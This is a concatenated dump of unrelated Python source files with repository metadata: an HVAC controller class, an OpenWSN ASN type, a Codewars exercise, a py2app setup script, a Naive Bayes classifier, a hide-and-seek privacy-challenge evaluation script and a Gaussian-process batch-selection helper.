Auto1 = 2
Auto2 = 3
Manual = 4
class Ideo:
def __init__(self, out):
self.__out = out
self._lowSpeed = 90
self._deviceId = 0
self._listeners = []
def _send(self, command, params):
output = "{0},{1:02X},{2:08X}".format(self._deviceId, command, params)
self.__out.write(output)
    # Kitchen boost button (runs at max speed for 30 minutes)
def boost(self):
self._send(0x94,0)
def setAwayMode(self, mode):
if mode:
self._send(0x41,1 << 16)
else:
self._send(0x41,0)
def setDateTime(self, dayOfWeek, hours, minutes):
self._send(0x3A, dayOfWeek + (hours << 8) + (minutes << 16))
def setMinAirflow(self, airflow):
self._send(0x3c, airflow << 16)
def setMaxAirflow(self, airflow):
self._send(0x3d, airflow << 16)
def setSchedule(self, mode):
self._send(0x3B, mode.value)
def setDirtyFilterRpmThreshold(self, rpm):
self._send(0x59, rpm << 16)
def requestInsideTemp(self):
self._send(0x31,0)
def requestOutsideTemp(self):
self._send(0x32,0)
def requestStatus(self):
self._send(0x33,0)
def register(self, listener):
self._listeners.append(listener)
def parseIncomingMessage(self, message):
message = message.strip(" \r\n")
tokens = message.split(",")
if (len(tokens) < 3): return
command = int(tokens[1], 16)
params = int(tokens[2], 16)
if (params==0): return
# Inside inlet (inside dirty air) temperature topic
if command == 0x31:
inlet_temp = (params >> 16) / 10.0
outlet_temp = (params & 0xFFFF) / 10.0
for r in self._listeners:
r.onInsideTemperatureUpdate(inlet_temp, outlet_temp)
# Outside inlet (fresh air) temperature topic
if command == 0x32:
inlet_temp = (params >> 16) / 10.0
outlet_temp = (params & 0xFFFF) / 10.0
for r in self._listeners:
r.onOutsideTemperatureUpdate(inlet_temp, outlet_temp)
# Status topic
if command == 0x33:
airflow = AirflowState ((params >> 16) & 0xf)
bypass = BypassState ((params >> 12) & 0xf)
for r in self._listeners:
r.onStatusUpdate(airflow, bypass)
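
if __name__ == '__main__':
    # Minimal wiring sketch (illustrative only; PrintListener is a
    # hypothetical listener, not part of the service):
    import sys

    class PrintListener:
        def onInsideTemperatureUpdate(self, inlet, outlet):
            print('inside', inlet, outlet)

        def onOutsideTemperatureUpdate(self, inlet, outlet):
            print('outside', inlet, outlet)

        def onStatusUpdate(self, airflow, bypass):
            print('status', airflow, bypass)

    ideo = Ideo(sys.stdout)
    ideo.register(PrintListener())
    # Feed a fake inside-temperature frame (command 0x31, inlet 21.5 C in
    # the high word, outlet 19.0 C in the low word):
    ideo.parseIncomingMessage('0,31,%08X' % ((215 << 16) + 190))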
|
[
"noreply@github.com"
] |
gstrub.noreply@github.com
|
dedf8c704bb8ecf6e6a002c52db956755b3875a1
|
15fcbb82c3fd15d9bb5bced735120d02d34e3521
|
/openwsn-sw/software/openvisualizer/openvisualizer/openType/typeAsn.py
|
7bec83e6230345541c68462414ea327ff2757c56
|
[] |
no_license
|
jobishjohn/comi-client-openwsn
|
bae75699532d4dee56d01a35eda4a36754ebe372
|
2c6de5013cb0e24e22db2d2c2689430c25972f55
|
refs/heads/master
| 2023-05-30T12:10:08.254275
| 2021-06-07T08:42:27
| 2021-06-07T08:42:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,098
|
py
|
# Copyright (c) 2010-2013, Regents of the University of California.
# All rights reserved.
#
# Released under the BSD 3-Clause license as published at the link below.
# https://openwsn.atlassian.net/wiki/display/OW/License
import logging
log = logging.getLogger('typeAsn')
log.setLevel(logging.ERROR)
log.addHandler(logging.NullHandler())
import openType
class typeAsn(openType.openType):
def __init__(self):
# log
log.info("creating object")
# initialize parent class
openType.openType.__init__(self)
def __str__(self):
return '0x{0}'.format(''.join(["%.2x"%b for b in self.asn]))
#======================== public ==========================================
    def update(self,byte0_1,byte2_3,byte4):
        # pack the 5-byte ASN, most-significant byte first (matching the
        # hex order printed by __str__), from the high byte and the two
        # 16-bit words received
        self.asn = [
            byte4,          # byte 4 (MSB)
            byte2_3>>8,     # byte 3
            byte2_3%256,    # byte 2
            byte0_1>>8,     # byte 1
            byte0_1%256,    # byte 0 (LSB)
        ]
#======================== private =========================================
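
if __name__ == '__main__':
    # Minimal sketch (illustrative values): pack an ASN and print it.
    a = typeAsn()
    a.update(0x0102, 0x0304, 0x05)
    print(a)  # 0x0503040102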
|
[
"akaraaa@github.ugent.be"
] |
akaraaa@github.ugent.be
|
b003c95621e0c9b5b64bc1d6f057801ceb71d523
|
80fa04aa56a57abf1a690c5d57a0465073aa7552
|
/CodeWars/5-EnoughSpace.py
|
aacfedef370f1d3864299b15fc55a7be340d51fb
|
[] |
no_license
|
ViktoriiaSpiridonova/PythonCore
|
d395ff60aef8d3706edc6cf490ee77955e6d2b39
|
107c5a8b2660caab247eb00e909af4253855fc06
|
refs/heads/master
| 2020-04-16T05:22:51.625173
| 2019-02-21T19:22:05
| 2019-02-21T19:22:05
| 165,298,453
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
def enough(cap, on, wait):
    if on + wait <= cap:
return 0
else:
return on + wait - cap
|
[
"noreply@github.com"
] |
ViktoriiaSpiridonova.noreply@github.com
|
29e68f9ed314c878361224e5b2b97843d3d8ff32
|
301cf02790551c19b410e18560c9d6bf1d58e878
|
/setup.py
|
e47178794917dce123bdd0ef55ed9bfc1b5a63d6
|
[] |
no_license
|
luciodj/solitaire
|
4780b9c01a63f0a7c4da5df1dbcb4cc39d303ab8
|
15ab3fbdc1ae76a219a64fe9133c97b854dea12f
|
refs/heads/master
| 2021-01-10T07:41:03.218909
| 2019-02-10T14:30:28
| 2019-02-10T14:30:28
| 45,679,248
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 514
|
py
|
"""
Script for building SolitaireDJ.
Usage:
python setup.py py2app
"""
from setuptools import setup
NAME = 'SolitaireDJ'
VERSION = '0.1'
plist = dict(
CFBundleIconFile=NAME,
CFBundleName=NAME,
CFBundleShortVersionString=VERSION,
CFBundleGetInfoString=' '.join([NAME, VERSION]),
CFBundleExecutable=NAME,
CFBundleIdentifier='org.pygame.solitairedj',
)
setup(
data_files=['data'],
app=[
dict(script="Solitaire.py", plist=plist),
],
setup_requires=["py2app"],
)
|
[
"pilot@flyingpic24.com"
] |
pilot@flyingpic24.com
|
a034067a02cee32763a5f0c9746c1136dd9fc6c7
|
9dfd53873f7cf1a262089b3db2519cb4ae81caed
|
/scripts/NaiveBayesClassifier.py
|
cb43b697e60eaad35e91417a4355fb1e5e7b5e3f
|
[
"MIT"
] |
permissive
|
debjyoti385/intelliad
|
026194ff4386cbc9df7ea656c0b3b7609ffcef43
|
736bfd25557f3eb442f3500fb4bfab5d17183d6c
|
refs/heads/master
| 2020-04-22T17:30:09.233725
| 2016-02-07T02:38:21
| 2016-02-07T02:38:21
| 25,104,412
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,383
|
py
|
import nltk
from nltk.corpus import stopwords
import operator
from math import exp
############CONFIG#############
stops = set(stopwords.words('english'))
hashModuloPrime = 31
################################
#############UTILITY FUNCTIONS#########
def isStopWord(word):
return (word.lower() in stops)
def getHashValue(word):
return hash(word.lower()) % hashModuloPrime
# ignoring stopwords, calculate hash modulo prime and increase bucket counter to get
# constant size feature vector, like a histogram
def getHashTrickHistogramFeatureIgnoringStopWords(text):
feature=[0]*hashModuloPrime
for word in text.split():
if not isStopWord(word):
feature[getHashValue(word)]+=1
return feature
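# e.g. for "i invest in football", the stopwords "i" and "in" are dropped and
# "invest" and "football" each increment one of the 31 hash buckets, so any
# text maps to the same fixed-size histogram regardless of its length.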
# ignoring stopwords, calculate word frequency map of text
def getWordFrequencyFeatureIgnoringStopWords(text):
freqFeat={}
for word in text.split():
wordLow=word.lower()
if not isStopWord(wordLow):
if wordLow not in freqFeat:
freqFeat[wordLow]=0
freqFeat[wordLow]+=1
return freqFeat
def mean(V):
return sum(V)*1.0/len(V)
def stdev(V):
m=mean(V)
s=0
for i in range(len(V)):
s+=((V[i]-m)**2)
return (s/len(V))**0.5
#############MODEL#####################
class NaiveBayesModel:
def __init__(self,categorySet):
self.categorySet=categorySet
self.prior={}
self.trainingPoints=0
self.trainingData=[]
self.classFeatureMean = {}
self.classFeatureStd = {}
self.classFeatureValues = {}
def trainSingle(self,text,labelSet):
self.trainingPoints+=1
# update apriori probability
for label in labelSet:
if label not in self.prior:
self.prior[label]=1.0
else:
self.prior[label]+=1.0
# train model
feature=getHashTrickHistogramFeatureIgnoringStopWords(text)
self.trainingData.append((feature,labelSet))
# call after training all the model
def evaluateModelParameters(self):
FeatLen=len(self.trainingData[0][0])
TrainingSize=len(self.trainingData)
#print 'TrainingSize:',TrainingSize
#print self.trainingData[0][1]
for trainingPoint in self.trainingData:
#print "trainingPoint=",trainingPoint
feature=trainingPoint[0]
labelSet=trainingPoint[1]
for label in labelSet:
if label not in self.classFeatureValues:
self.classFeatureValues[label]=[]
self.classFeatureValues[label].append(feature)
#for label in self.classFeatureValues:
#print 'Label:',label,',Values:',self.classFeatureValues[label]
for label in self.classFeatureValues:
for featureId in range(FeatLen):
S=[]
for trainingIndex in range(len(self.classFeatureValues[label])):
S.append(self.classFeatureValues[label][trainingIndex][featureId])
#print label,S
M = mean(S)
STD = stdev(S)
if label not in self.classFeatureMean:
self.classFeatureMean[label]=[]
if label not in self.classFeatureStd:
self.classFeatureStd[label]=[]
self.classFeatureMean[label].append(M)
self.classFeatureStd[label].append(STD)
#print 'Label:',label,',Mean & STD:'
#print self.classFeatureMean[label]
#print self.classFeatureStd[label]
def getAprioriProb(self,label):
if label not in self.prior:
return 0
#print label,'Apriori=',self.prior[label]/self.trainingPoints
return self.prior[label]/self.trainingPoints
def getLikelihood(self,label,attrValue,index):
m=self.classFeatureMean[label][index]
s=self.classFeatureStd[label][index]
'''if s==0.0:
return 1
power = -(attrValue-m)**2/(2*(s**2))
factor = (1.0/(2*3.142*s**2))**0.5
return factor*exp(power)
'''
return exp(-(attrValue-m)**2)
def getLabelsWithScores(self,text):
feature=getHashTrickHistogramFeatureIgnoringStopWords(text)
#print 'Test feature:',feature
finalprob={}
for category in self.categorySet:
likelihoodProduct=1
for i in range(len(feature)):
Pi_C = self.getLikelihood(category,feature[i],i)
likelihoodProduct*=Pi_C
finalprob[category]=likelihoodProduct*self.getAprioriProb(category)
return finalprob
def getBestLabel(self,text):
finalprob = self.getLabelsWithScores(text)
sorted_prob = sorted(finalprob.items(), key=operator.itemgetter(1),reverse=True)
return sorted_prob[0][0]
if __name__=='__main__':
nbm = NaiveBayesModel(set(['Business','Sports']))
nbm.trainSingle('i invest in football',set(['Business','Sports']))
nbm.trainSingle('i invest in XYZ',set(['Business']))
nbm.trainSingle('i love football',set(['Sports']))
nbm.evaluateModelParameters()
testText = 'i invest'
print 'Query:',testText
print 'Scores:',nbm.getLabelsWithScores(testText)
print 'Best class:',nbm.getBestLabel(testText)
|
[
"amit.bendale@batcave.local"
] |
amit.bendale@batcave.local
|
fc918b495238fde84c262720524de088c17cb4f9
|
c00ee80daf5b97904209823c74f5201db6739618
|
/main.py
|
01fd1a39c1d00b6ba1a73a0525bcb140b75b4140
|
[] |
no_license
|
nesl/hide-and-seek-challenge
|
db6c6487e53b8c1acd127579b1b01ed37cfce6dc
|
d57a8c32026f625eab0454cde5c156532a7fab93
|
refs/heads/master
| 2023-02-25T00:55:46.242582
| 2021-02-03T03:28:56
| 2021-02-03T03:28:56
| 333,614,839
| 0
| 1
| null | 2021-02-03T00:53:52
| 2021-01-28T01:52:13
|
Python
|
UTF-8
|
Python
| false
| false
| 14,534
|
py
|
"""
Script for competitors to locally test their solutions.
The script follows the logic of the competition's scoring process. The hider from `hider.py` and the seeker from
`seeker.py` will be imported and played against each other. Should be executed from containing directory.
See the command help:
```sh
$ python main.py --help
```
See also docstring of `main()` for more details.
Note:
The script requires the dependencies listed in `requirements.txt`. It can also be run without tensorflow==1.15.2
or keras==2.3.1, but in that case, some parts of the script will be skipped.
Last updated Date: Oct 17th 2020
Code author: Evgeny Saveliev
Contact: e.s.saveliev@gmail.com
"""
import os
import argparse
import shutil
import numpy as np
from utils.misc import (
tf115_found,
tfdeterminism_found,
fix_all_random_seeds,
temp_seed_numpy,
in_progress,
tf_fixed_seed_seesion,
)
if tf115_found:
from utils.misc import tf_set_log_level
import logging
tf_set_log_level(logging.FATAL)
# # May be useful for determinism:
# import tensorflow as tf
# from keras import backend as K
# session_conf = tf.ConfigProto(intra_op_parallelism_threads=1, inter_op_parallelism_threads=1)
# sess = tf.Session(graph=tf.get_default_graph(), config=session_conf)
# K.set_session(sess)
if tfdeterminism_found:
from tfdeterminism import patch
patch()
else:
print("Warning: TensorFlow 1.15 was not found so the parts of the script that rely on it will be skipped.")
import utils.data_preprocess as prp
from utils.solutions import (
load_data,
load_generated_data,
parse_hider_output,
validate_hider_output,
validate_seeker_output,
benchmark_hider,
)
from utils.metric_utils import reidentify_score, feature_prediction, one_step_ahead_prediction
import hider as hider_module
import seeker as seeker_module
def main(args):
"""The main script - hider from `hider.py` and the seeker from `seeker.py` will be imported and played against
each other.
Stages of the script:
* Load data.
* Run the hider.
* Evaluate hider via feature prediction and one-step-ahead prediction.
* Run the seeker (on the hider's generated data).
Args:
args (argparse.Namespace): parsed arguments from the command line.
Raises:
ValueError: in case there are issues with required files or directories.
"""
# ================================================= System setup. ==================================================
# If no TensorFlow 1.15 found on the system, skip parts of the script.
if not tf115_found:
args.skip_fp = True
args.skip_osa = True
# Fix random seeds.
fix_all_random_seeds(args.seed)
# NOTE:
# The fix_all_random_seeds() call may not be sufficient to make tensorflow fully deterministic.
# See, for example: https://github.com/NVIDIA/framework-determinism
# ============================================== Prepare directories. ==============================================
# Code directory.
code_dir = os.path.abspath(".")
if not os.path.exists(code_dir):
raise ValueError(f"Code directory not found at {code_dir}.")
print(f"\nCode directory:\t\t{code_dir}")
# Data path.
data_path = os.path.abspath(args.data_path)
if not os.path.exists(data_path):
raise ValueError(f"Data file not found at {data_path}.")
print(f"Data file:\t\t{data_path}")
data_dir = os.path.dirname(data_path)
data_file_name = os.path.basename(data_path)
# Output directories.
out_dir = os.path.abspath(args.output_dir)
if not os.path.exists(out_dir):
os.makedirs(out_dir, exist_ok=True)
print(f"Output directory:\t{out_dir}")
hider_dir = os.path.join(out_dir, "hider")
if os.path.exists(hider_dir):
shutil.rmtree(hider_dir)
os.makedirs(hider_dir, exist_ok=True)
seeker_dir = os.path.join(out_dir, "seeker")
if os.path.exists(seeker_dir):
shutil.rmtree(seeker_dir)
os.makedirs(seeker_dir, exist_ok=True)
print(f" ├ Hider output:\t{hider_dir}")
print(f" └ Seeker output:\t{seeker_dir}\n")
# =================================================== Load data. ===================================================
if args.debug_data <= 0:
args.debug_data = False
with in_progress("Preprocessing and loading data"):
original_data, original_padding_mask, train_idx, test_idx = load_data(
data_dir=data_dir,
data_file_name=data_file_name,
max_seq_len=args.max_seq_len,
seed=args.seed,
train_rate=args.train_frac,
force_reprocess=True, # If True, re-preprocess data every time (rather than reusing).
debug_data=args.debug_data,
)
print(f"\nOriginal data preview (original_data[:2, -10:, :2]):\n{original_data[:2, -10:, :2]}\n")
# ================================================= Part I: Hider. =================================================
# Set up hider input.
original_data_train = original_data[train_idx]
original_padding_mask_train = original_padding_mask[train_idx]
hider_input = {"data": original_data_train, "seed": args.seed, "padding_mask": original_padding_mask_train}
# Run hider.
with in_progress("Running Hider"):
hider_output = hider_module.hider(hider_input)
generated_data, generated_data_padding_mask = parse_hider_output(hider_output)
print(f"\nGenerated data preview (generated_data[:2, -10:, :2]):\n{generated_data[:2, -10:, :2]}\n")
# Save hider output.
hider_output_file = os.path.join(hider_dir, "data.npz")
np.savez(
hider_output_file,
generated_data=generated_data,
padding_mask=generated_data_padding_mask if generated_data_padding_mask is not None else [],
)
# Evaluate hider.
# - Prepare data
if not (args.skip_fp and args.skip_osa):
with in_progress("Preparing data for hider evaluation"):
generated_data, generated_data_padding_mask = load_generated_data(hider_output_file)
_, original_data_train_imputed = prp.preprocess_data(original_data_train, original_padding_mask_train)
_, generated_data_imputed = prp.preprocess_data(generated_data, generated_data_padding_mask)
_, original_data_test_imputed = prp.preprocess_data(
original_data[test_idx], original_padding_mask[test_idx]
)
# - Feature prediction step.
if not args.skip_fp:
num_features = original_data_train.shape[2]
with temp_seed_numpy(args.seed):
feature_idx = np.random.permutation(num_features)[: args.feature_prediction_no]
print(f"\nFeature prediction evaluation on IDs: {feature_idx}\n")
with in_progress("Running feature prediction"):
with in_progress("Running on [original data]"):
with tf_fixed_seed_seesion(args.seed):
original_feature_prediction_accuracy, ori_task_types = feature_prediction(
train_data=original_data_train_imputed,
test_data=original_data_test_imputed,
index=feature_idx,
verbose=args.eval_verbose,
)
with in_progress("Running on [generated data]"):
with tf_fixed_seed_seesion(args.seed):
new_feature_prediction_accuracy, new_task_types = feature_prediction(
train_data=generated_data_imputed,
test_data=original_data_test_imputed,
index=feature_idx,
verbose=args.eval_verbose,
)
print("\nFeature prediction errors (per feature):")
print(f"Original data:\t\t{original_feature_prediction_accuracy}")
print(f"New (hider-generated):\t{new_feature_prediction_accuracy}\n")
# - Save results.
with open(os.path.join(hider_dir, "feature_prediction_scores.txt"), "w") as f:
for score in new_feature_prediction_accuracy:
print(score.astype(str), file=f)
else:
print(f"Feature prediction step skipped!{ '' if tf115_found else ' (TensorFlow 1.15 not found)' }\n")
# - One-step-ahead prediction step.
if not args.skip_osa:
with in_progress("Running one-step-ahead prediction"):
with in_progress("Running on [original data]"):
with tf_fixed_seed_seesion(args.seed):
original_osa_perf = one_step_ahead_prediction(
train_data=original_data_train_imputed,
test_data=original_data_test_imputed,
verbose=args.eval_verbose,
)
with in_progress("Running on [generated data]"):
with tf_fixed_seed_seesion(args.seed):
new_osa_perf = one_step_ahead_prediction(
train_data=generated_data_imputed,
test_data=original_data_test_imputed,
verbose=args.eval_verbose,
)
print("\nOne-step-ahead prediction errors (per feature):")
print(f"Original data:\t\t{original_osa_perf}")
print(f"New (hider-generated):\t{new_osa_perf}\n")
# - Save results.
with open(os.path.join(hider_dir, "osa_score.txt"), "w") as f:
print(new_osa_perf.astype(str), file=f)
else:
print(f"One-step-ahead prediction step skipped!{ '' if tf115_found else ' (TensorFlow 1.15 not found)' }\n")
if not args.skip_fp and not args.skip_osa:
passed = benchmark_hider(
feat_scores=new_feature_prediction_accuracy,
task_types=new_task_types,
osa_score=new_osa_perf,
eval_feat_scores=original_feature_prediction_accuracy,
eval_task_types=ori_task_types,
eval_osa_score=original_osa_perf,
threshold_auroc=0.85,
threshold_rmse=5.00,
)
print(f'>>> Hider evaluation: {"passed" if passed else "failed"}')
# Validation of hider results:
validate_hider_output(
hider="hider from hider.py",
hider_dir=hider_dir,
features=feature_idx if not args.skip_fp else None,
data_shape=original_data_train.shape,
raise_exception=True,
skip_fp=args.skip_fp,
skip_osa=args.skip_osa,
)
# ======================================= Part II: Seeker (vs Part I Hider). =======================================
# Set up seeker input.
seeker_input = {
"generated_data": generated_data,
"enlarged_data": original_data,
"seed": args.seed,
"generated_data_padding_mask": generated_data_padding_mask,
"enlarged_data_padding_mask": original_padding_mask,
}
# Run seeker.
with in_progress("Running Seeker"):
reidentified_labels = seeker_module.seeker(seeker_input)
# Save seeker output.
seeker_output_file = os.path.join(seeker_dir, "data.npz")
np.savez(seeker_output_file, reidentified_data=reidentified_labels)
# Evaluate seeker (vs hider).
true_labels = np.isin(np.arange(original_data.shape[0]), train_idx)
reidentified_labels = validate_seeker_output(
seeker="seeker from seeker.py", seeker_output_path=seeker_output_file, labels=true_labels, raise_exception=True
)
reidentification_score = reidentify_score(true_labels, reidentified_labels)
print(f"\nTrue labels:\t\t\t\t{true_labels.astype(int)}")
print(f"Reidentified (by seeker) labels:\t{reidentified_labels}")
print(f"Reidentification score:\t\t\t{reidentification_score:.4f}\n")
if __name__ == "__main__":
# Inputs for the main function
parser = argparse.ArgumentParser(
description="A script that emulates the competition's scoring process, "
"the hider (from hider.py) is run against the seeker (from seeker.py)."
)
parser.add_argument(
"-d",
"--data_path",
metavar="PATH",
default="./data/train_longitudinal_data.csv",
type=str,
help="Data file path (Amsterdam dataset). Defaults to './data/train_longitudinal_data.csv'.",
)
parser.add_argument(
"-o",
"--output_dir",
metavar="PATH",
default="./output",
type=str,
help="Output directory. Defaults to './output'.",
)
parser.add_argument(
"-m", "--max_seq_len", metavar="INT", default=100, type=int, help="Max sequence length limit. Defaults to 100."
)
parser.add_argument(
"-t", "--train_frac", default=0.5, metavar="FLOAT", type=float, help="Training set fraction. Defaults to 0.5."
)
parser.add_argument(
"-e",
"--hider_eval_threshold",
default=0.85,
metavar="FLOAT",
type=float,
help="Hider evaluation threshold. Defaults to 0.85.",
)
parser.add_argument(
"-f",
"--feature_prediction_no",
metavar="INT",
default=5,
type=int,
help="Number of features in the subset of features used to run feature prediction "
"(part of hider evaluation). Defaults to 5.",
)
parser.add_argument("-s", "--seed", metavar="INT", default=0, type=int, help="Random seed. Defaults to 0.")
parser.add_argument(
"-g",
"--debug_data",
metavar="INT",
default=0,
type=int,
help="Set this to a non-0 value to use a 'debug' subset of the dataset instead of the whole dataset "
"(useful for speedy debugging), only the first --debug_data many rows of the data file will be loaded. "
"Defaults to 0.",
)
parser.add_argument(
"--skip_fp", action="store_true", default=False, help="Skip feature prediction step of hider evaluation if set."
)
parser.add_argument(
"--skip_osa",
action="store_true",
default=False,
help="Skip one-step-ahead prediction step of hider evaluation if set.",
)
parser.add_argument(
"--eval_verbose",
action="store_true",
default=False,
help="If set, the underlying training in hider evaluation stages will be shown verbosely "
"(training epoch etc.).",
)
parsed_args = parser.parse_args()
# Call main function
main(parsed_args)
|
[
"wangziqi000@126.com"
] |
wangziqi000@126.com
|
3d0fae30bd982b8f9f658f48d051db3fde318b8c
|
1d503f37def0928bcb7d1b2b9a9135656b47107b
|
/excursion/active_learning/batch.py
|
c88dc846528d9e44b38a34fa965a535268a3774f
|
[
"Apache-2.0"
] |
permissive
|
Abdoelabassi/excursion
|
6fda40b9bc712ff75cf77ad2daa75d15634da754
|
c5a5c6d882b8dd1008fbabf1a3b81eaba382bef6
|
refs/heads/master
| 2023-07-30T19:50:24.667513
| 2021-07-08T09:48:47
| 2021-07-08T09:48:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,462
|
py
|
import torch
import gpytorch
import os
import itertools
from excursion import get_gp, fit_hyperparams
from copy import deepcopy
class batchGrid(object):
"""
A class to represent the underlying grid with useful features for batch point selection
...
Attributes
-----------
batch_types : dict()
grid : torch.Tensor
the acquisition values for each point in the grid
device : str
device to use, gpu or cpu
picked_indexs : list
list to keep track of the indices already selected for query or the batch
_n_dims : int
dimension of the grid
Methods
-------
pop(index)
Removes index from future picks so it is not selected again
update(acq_value_grid)
Update the stored acquisition values for the same grid
"""
def __init__(self, acq_values_of_grid, device, dtype, n_dims):
self.grid = torch.as_tensor(acq_values_of_grid, device=device, dtype=dtype)
self.batch_types = {
"Naive": self.get_naive_batch,
"KB": self.get_kb_batch,
"Distanced": self.get_distanced_batch,
# "Cluster": self.get_cluster_batch,
}
self.picked_indexs = []
self._n_dims = n_dims
self.device = device
self.dtype = dtype
def __torch_function__(self, func, types, args=(), kwargs=None):
if kwargs is None:
kwargs = {}
# unwrap any batchGrid arguments to their underlying tensors
args = [a.grid if hasattr(a, "grid") else a for a in args]
ret = func(*args, **kwargs)
return batchGrid(ret, self.device, self.dtype, self._n_dims)
def pop(self, index):
self.grid[index] = torch.Tensor([(-1.0) * float("Inf")])
def update(self, acq_values_of_grid, device, dtype):
self.grid = torch.as_tensor(acq_values_of_grid, device=device, dtype=dtype)
def get_first_max_index(self, gp, testcase, device, dtype):
X_train = gp.train_inputs[0].to(device, dtype)
new_index = torch.argmax(self.grid)
new_x = testcase.X.to(device, dtype)[new_index]
# if the index is not already picked nor in the training set
# accept it and remove it from future picks
if (new_index not in self.picked_indexs) and (
new_x.tolist() not in X_train.tolist()
):
self.pop(new_index)
self.picked_indexs.append(new_index.item())
return new_index.item()
else:
self.pop(new_index)
return self.get_first_max_index(gp, testcase, device, dtype)
def get_naive_batch(self, gp, testcase, batchsize, device, dtype, **kwargs):
new_indexs = []
while len(new_indexs) < batchsize:
max_index = self.get_first_max_index(gp, testcase, device, dtype)
if max_index not in new_indexs:
new_indexs.append(max_index)
self.pop(max_index)
else:
self.pop(max_index)
max_index = self.get_first_max_index(gp, testcase, device, dtype)
return new_indexs
def get_kb_batch(self, gp, testcase, batchsize, device, dtype, **kwargs):
X_train = gp.train_inputs[0].to(device, dtype)
new_indexs = []
fake_x_list = torch.Tensor([]).to(device, dtype)
fake_y_list = torch.Tensor([]).to(device, dtype)
likelihood = kwargs["likelihood"]
algorithmopts = kwargs["algorithmopts"]
excursion_estimator = kwargs["excursion_estimator"]
gp_fake = deepcopy(gp)
while len(new_indexs) < batchsize:
max_index = self.get_first_max_index(gp, testcase, device, dtype)
if max_index not in new_indexs:
new_indexs.append(max_index)
self.pop(max_index)
fake_x = testcase.X.to(device, dtype)[max_index].reshape(1, -1)
fake_x_list = torch.cat((fake_x_list, fake_x), 0)
gp_fake.eval()
likelihood.eval()
fake_y = likelihood(gp_fake(fake_x)).mean
fake_y_list = torch.cat((fake_y_list, fake_y), 0)
# print('******* train_targets', gp_fake.train_targets.dim(), gp_fake.train_targets)
# print('******* model_batch_sample ', len(gp_fake.train_inputs[0].shape[:-2]))
gp_fake = gp_fake.get_fantasy_model(
fake_x_list, fake_y_list, noise=likelihood.noise
)
# gp_fake = self.update_fake_posterior(
# testcase,
# algorithmopts,
# gp_fake,
# likelihood,
# fake_x_list,
# fake_y_list,
# )
new_acq_values = excursion_estimator.get_acq_values(gp_fake, testcase)
self.update(new_acq_values, device, dtype)
else:
self.pop(max_index)
max_index = self.get_first_max_index(gp_fake, testcase, device, dtype)
return new_indexs
def update_fake_posterior(
self,
testcase,
algorithmopts,
model_fake,
likelihood,
list_fake_xs,
list_fake_ys,
):
with torch.autograd.set_detect_anomaly(True):
if self._n_dims == 1:
# calculate new fake training data
inputs = torch.cat(
(model_fake.train_inputs[0], list_fake_xs), 0
).flatten()
targets = torch.cat(
(model_fake.train_targets.flatten(), list_fake_ys.flatten()), dim=0
).flatten()
else:
inputs = torch.cat((model_fake.train_inputs[0], list_fake_xs), 0)
targets = torch.cat(
(model_fake.train_targets, list_fake_ys), 0
).flatten()
model_fake.set_train_data(inputs=inputs, targets=targets, strict=False)
model_fake = get_gp(
inputs, targets, likelihood, algorithmopts, testcase, self.device
)
likelihood.train()
model_fake.train()
fit_hyperparams(model_fake, likelihood)
return model_fake
def euclidean_distance_idxs(self, array_idxs, point_idx, testcase):
# no points selected yet: treat the candidate as infinitely far away
if len(array_idxs) == 0:
return 1e8
array = testcase.X[array_idxs]
point = testcase.X[point_idx] #vector
d = array - point
d = torch.sqrt(torch.sum(d**2, dim=-1)) #per-point distances to the candidate
return torch.min(d).item() #scalar: distance to the nearest selected point
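# Worked example (a sketch): with testcase.X = [[0,0],[0,1],[3,4]],
# array_idxs = [0,1] and point_idx = 2, the per-point distances are
# [5.0, sqrt(18) ~ 4.243] and the minimum, 4.243, is returned;
# get_distanced_batch below accepts the candidate only if that minimum
# exceeds c times the grid step.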
def get_distanced_batch(self, gp, testcase, batchsize, device, dtype, **kwargs):
new_indexs = []
#c times the minimum grid step of separation between selected points in batch
c = 75 #has to be > 1
step = min((testcase.rangedef[:,1] - testcase.rangedef[:,0])/testcase.rangedef[:,-1])
distance = c * step
while len(new_indexs) < batchsize:
max_index = self.get_first_max_index(gp, testcase, device, dtype)
if max_index not in new_indexs:
if self.euclidean_distance_idxs(new_indexs, max_index, testcase) >= distance:
new_indexs.append(max_index)
self.pop(max_index)
else:
self.pop(max_index)
max_index = self.get_first_max_index(gp, testcase, device, dtype)
return new_indexs
|
[
"iem244@nyu.edu"
] |
iem244@nyu.edu
|
7b18809d8ce5dfbde4187a70139483aba4117748
|
ce35645d42d468420bcc06208dca10005d1ff4b8
|
/HomeWork2/Task1.py
|
9b21a631d1fc93a020f9ca4d7f4b4fab148acd1c
|
[] |
no_license
|
abulashvili27/G-25
|
73b07f8f17f46d1db8e54fc63713891da8bc2f4c
|
d569c93accf6f9321583a667dcdf3f918f909b08
|
refs/heads/main
| 2023-04-28T19:18:41.836180
| 2021-05-14T11:44:48
| 2021-05-14T11:44:48
| 348,733,359
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,293
|
py
|
first_book_name = "The Knight in the Panther's Skin"
first_book_author = "Shota Rustaveli"
first_book_year = "XII century"
first_book_pages = "222"
second_book_name = "The Right Hand of the Grand Master"
second_book_author = "Konstantine Gamsakhurdia"
second_book_year = "1939"
second_book_pages = "397"
third_book_name = "Antonio and David"
third_book_author = "Jemal Karchkhadze"
third_book_year = "1987"
third_book_pages = "134"
class Book:
def __init__(self, name, author, year, pages):
self.name = name
self.author = author
self.year = year
self.pages = pages
def info(self):
return f"Name - {self.name} , Author - {self.author}, Year - {self.year}, Pages - {self.pages}"
print("1) The Knight in the Panther's Skin \n2) The Right Hand of the Grand Master \n3) Antonio and David")
user_input = int(input("Choose book: "))
if user_input == 1:
b = Book(first_book_name, first_book_author, first_book_year, first_book_pages)
print(b.info())
elif user_input == 2:
b = Book(second_book_name, second_book_author, second_book_year, second_book_pages)
print(b.info())
elif user_input == 3:
b = Book(third_book_name, third_book_author, third_book_year, third_book_pages)
print(b.info())
else:
print("Book didn't find")
|
[
"davit.abulashvili.1@btu.edu.ge"
] |
davit.abulashvili.1@btu.edu.ge
|
3a3649075ac12b193692404f553014dccd4d8a43
|
6d17b9e5868cb5d8febc31acdb2e1d460277e97b
|
/PostsRestApi/serializers.py
|
53aa53dc5b770c484ff708e8339ae5aa53ad6192
|
[] |
no_license
|
jpassgo/PostsApi
|
